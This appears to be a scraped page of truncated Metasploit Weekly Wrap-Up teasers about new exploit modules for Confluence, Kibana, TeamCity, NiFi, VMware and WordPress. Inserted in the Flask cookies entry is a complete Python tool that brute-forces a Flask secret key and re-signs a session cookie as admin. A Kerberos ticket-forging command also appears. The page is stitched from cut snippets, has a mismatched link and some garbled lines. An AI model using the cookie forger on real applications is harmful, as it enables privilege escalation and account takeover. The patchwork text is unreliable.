Metasploit Weekly Wrap-Up (4 min read)
This privilege escalation escalated quickly
This release features a module leveraging CVE-2023-22515
[http://shop.airportcarsonline.com/blog/post/2023/10/04/etr-cve-2023-22515-zero-day-privilege-escalation-in-confluence-server-and-data-center/]
, a vulnerability in Atlassian’s on-premises Confluence Server first listed as a
privilege escalation, but quickly recategorized as a “broken access control”
with a CVSS score of 10. The exploit itself is very simple and easy to use, so
when
Metasploit Weekly Wrap-Up (3 min read)
Kibana pollution
This week, contributor h00die [http://github.com/h00die] added a module that
leverages a prototype pollution bug in Kibana prior to version 7.6.3.
Specifically, the issue lies in the Upgrade Assistant and enables an attacker
to execute arbitrary code. The vulnerability can be triggered by sending a
query that sets a new constructor.prototype.sourceURL directly to Elastic, or
by submitting the same query through Kibana. Note that Kibana needs to be
restarted or wait for c
Metasploit Weekly Wrap-Up (2 min read)
New module content (3)
LDAP Login Scanner
Authors: Dean Welch
Type: Auxiliary
Pull request: #18197 [http://github.com/rapid7/metasploit-framework/pull/18197]
contributed by dwelch-r7 [http://github.com/dwelch-r7]
Path: scanner/ldap/ldap_login
Description: This PR adds a new login scanner module for LDAP. Login scanners
are the classes that provide functionality for testing authentication against
various different protocols and mechanisms. This LDAP login scanner supports
multiple types of aut
Metasploit Weekly Wrap-Up (3 min read)
TeamCity authentication bypass and remote code execution
This week’s Metasploit release includes a new module for a critical
authentication bypass in JetBrains TeamCity CI/CD Server. All versions of
TeamCity prior to 2023.05.4 are vulnerable to this issue. The
vulnerability was originally discovered by SonarSource, and the Metasploit
module was developed by Rapid7’s Principal Security Researcher Stephen Fewer, who
additionally published a technical analysis on AttackerKB for CVE-2023-4279
Metasploit Weekly Wrap-Up (4 min read)
Improved ticket forging
Metasploit’s admin/kerberos/forge_ticket module has been updated to work with
Windows Server 2022. In Windows Server 2022, Microsoft started requiring additional
PAC elements to be present: the PAC requestor and PAC attributes. Newly
forged tickets will have the necessary elements added automatically based on the
user-supplied domain SID and user RID. For example:
msf6 auxiliary(admin/kerberos/forge_ticket) > run aes_key=4a52b73cf37ba06cf693c40f352e2f4d2002ef61f6031f649
Metasploit Weekly Wrap-Up (4 min read)
Flask Cookies
This week includes two modules related to Flask cookie signatures. One is
specific to Apache Superset, where session cookies can be re-signed, allowing an
attacker to elevate their privileges and dump the database connection strings.
While adding this functionality, community member h00die
[http://github.com/h00die] also added a module for generically working with the
default session cookie used by Flask. This generic module,
auxiliary/gather/python_flask_cookie_signer
[http://git
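The re-signing attack described above only works because a Flask session cookie is just a signed, not encrypted, JSON blob: anyone holding the application's SECRET_KEY can verify, edit and re-sign it. The following is an added example, not code from the Metasploit module or from Flask/itsdangerous. It re-implements the default Flask session cookie format (URL-safe base64 JSON payload, "." , base64 big-endian timestamp, ".", base64 HMAC-SHA1, with the signing key derived as HMAC-SHA1(SECRET_KEY, b"cookie-session")) using only the standard library, so it runs offline. It assumes an uncompressed payload (Flask prefixes zlib-compressed payloads with a "." and those are rejected here), and the secret key, candidate secret list and session contents are constructed sample values.

```python
import base64
import hashlib
import hmac
import json
import time
from typing import Iterable, Optional

# Salt itsdangerous uses for Flask's SecureCookieSessionInterface.
SALT = b"cookie-session"


def _b64e(data: bytes) -> str:
    """URL-safe base64 without padding, as itsdangerous emits it."""
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode("ascii")


def _b64d(text: str) -> bytes:
    """Inverse of _b64e: restore padding before decoding."""
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def _derive_key(secret_key: bytes) -> bytes:
    # itsdangerous "hmac" key derivation: the signing key is HMAC-SHA1(secret, salt).
    return hmac.new(secret_key, SALT, hashlib.sha1).digest()


def sign_session(session: dict, secret_key: bytes, timestamp: Optional[int] = None) -> str:
    """Produce a cookie value in Flask's default session format (uncompressed payload)."""
    payload = _b64e(json.dumps(session, separators=(",", ":"), sort_keys=True).encode())
    ts = int(time.time()) if timestamp is None else timestamp
    ts_part = _b64e(ts.to_bytes((ts.bit_length() + 7) // 8, "big"))
    value = f"{payload}.{ts_part}"
    sig = hmac.new(_derive_key(secret_key), value.encode(), hashlib.sha1).digest()
    return f"{value}.{_b64e(sig)}"


def verify_session(cookie: str, secret_key: bytes) -> Optional[dict]:
    """Return the session dict if the signature is valid for secret_key, else None."""
    try:
        payload, ts_part, sig_part = cookie.rsplit(".", 2)
    except ValueError:
        return None
    expected = hmac.new(_derive_key(secret_key), f"{payload}.{ts_part}".encode(), hashlib.sha1).digest()
    if not hmac.compare_digest(expected, _b64d(sig_part)):
        return None
    if payload.startswith("."):
        # zlib-compressed payload: valid signature, but not decoded by this example.
        return None
    return json.loads(_b64d(payload))


def recover_secret(cookie: str, candidates: Iterable[bytes]) -> Optional[bytes]:
    """Brute-force a captured cookie against a list of candidate SECRET_KEY values
    (weak or default keys), the way a cookie-signer module would."""
    for secret in candidates:
        if verify_session(cookie, secret) is not None:
            return secret
    return None


def resign_with_known_secret(cookie: str, secret_key: bytes, changes: dict) -> Optional[str]:
    """Verify a cookie, apply changes to its claims, and re-sign it with the same key.
    This is the privilege-elevation step: the server cannot tell it from a genuine cookie."""
    session = verify_session(cookie, secret_key)
    if session is None:
        return None
    session.update(changes)
    return sign_session(session, secret_key)


if __name__ == "__main__":
    # Constructed sample values; not real keys or captured traffic.
    secret = b"weak-default-secret"
    captured = sign_session({"user_id": 42, "role": "user"}, secret)
    found = recover_secret(captured, [b"changeme", b"weak-default-secret", b"secret"])
    print("recovered secret:", found)
    forged = resign_with_known_secret(captured, found, {"role": "admin"})
    print("forged cookie verifies as:", verify_session(forged, found))
```

The mitigation follows directly from the code: the only thing standing between a user and a re-signed cookie is the secrecy and strength of SECRET_KEY, so any deployment still running with a vendor default or a key committed to source control should rotate it and invalidate existing sessions.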
Metasploit Weekly Wrap-Up (2 min read)
New module content (4)
Roundcube TimeZone Authenticated File Disclosure
Authors: joel, stonepresto, and thomascube
Type: Auxiliary
Pull request: #18286 [http://github.com/rapid7/metasploit-framework/pull/18286]
contributed by cudalac [http://github.com/cudalac]
Path: auxiliary/gather/roundcube_auth_file_read
AttackerKB reference: CVE-2017-16651
[http://attackerkb.com/topics/he57fr8fb4/cve-2017-16651?referrer=blog]
Description: This PR adds a module to retrieve an arbitrary file on hosts
run
Metasploit Weekly Wrap-Up (2 min read)
Pumpkin spice modules
Here in the northern hemisphere, fall is on the way: leaves changing, the air
growing crisp and cool, and some hackers changing the flavor of their caffeine.
This release features a new exploit module targeting Apache NiFi as well as a
new and improved library for interacting with it.
New module content (1)
Apache NiFi H2 Connection String Remote Code Execution
Authors: Matei “Mal” Badanoiu and h00die
Type: Exploit
Pull request: #18257 [http://github.com/rapid7/metasploit-fra
Metasploit Weekly Wrap-Up (3 min read)
Power(Shell)Point
This week’s new features and improvements start with two new exploit modules
leveraging CVE-2023-34960
[http://attackerkb.com/topics/vvjpmespup/cve-2023-34960?referrer=blog] in Chamilo
versions 1.11.18 and below and CVE-2023-26469
[http://attackerkb.com/topics/rt7g6vyw1l/cve-2023-26469?referrer=blog] in
Jorani 1.0.0. Like CVE-2023-34960
[http://attackerkb.com/topics/vvjpmespup/cve-2023-34960?, me too.
Sometimes I feel like I am being attacked by PowerPoint.
We also have several importers
Metasploit Weekly Wrap-Up (2 min read)
Meterpreter tests
This week’s release adds new payload tests to our automated test suite. This is
intended to help the team and community members identify issues and behavior
differences before changes land. Payloads run on a variety of
platforms including Windows, Linux, and OS X, each of which has multiple
Meterpreter implementations available that are now tested to help ensure
consistency. This should improve payload stability and make testing easier for
community members.
Metasploit Weekly Wrap-Up (2 min read)
A new Metabase RCE module, updates to the citrix_formssso_target_rce module for CVE-2023-3519 to include two new targets, Citrix ADC (NetScaler.1-65.25, and 12.1-64.17, and more
Metasploit Weekly Wrap-Up (4 min read)
Fly in the sky with this new cloud exploit!
This week, a new module was added that takes advantage of both an authentication
bypass and a command injection in certain versions of Western Digital's MyCloud
hardware. Submitted by community member Erik Wynter
[http://github.com/ErikWynter], this module gains access to the target,
attempts to bypass authentication, verifies whether that was successful, then
executes the payload with root privileges. This works on versions prior to
2.30.196, and offer
Metasploit Weekly Wrap-Up (3 min read)
Unauthenticated RCE in a VMware product
This week, community contributor h00die [http://github.com/h00die] added an
exploit module that leverages a command injection vulnerability in VMware Aria
Operations for Networks, formerly known as vRealize Network Insight. Versions
6.2 to 6.10 are vulnerable (CVE-2023-20887
[http://attackerkb.com/topics/gxz1cuyfh2/cve-2023-20887?referrer=blog]). A
remote attacker could abuse the Apache Thrift RPC interface by sending specially
crafted data and gain
Metasploit Weekly Wrap-Up (2 min read)
This week's wrap-up includes two new Metasploit modules: Piwigo Gather Credentials via SQL Injection (CVE-2023-26876) and Openfire authentication bypass with RCE plugin (CVE-2023-32315)
Metasploit Weekly Wrap-Up (2 min read)
Authentication bypass in WordPress plugin WooCommerce Payments
This week's Metasploit release includes a module for CVE-2023-28121 by h00die
[http://github.com/h00die]. This module can be used against any WordPress
instance that uses WooCommerce Payments < 5.6.1. The module exploits an
authorization bypass vulnerability in the WooCommerce Payments WordPress plugin:
adding a single request header triggers the bypass, after which the REST API can
be used to create a new admin user in WordPress.
New module content (3)
WordPress plugin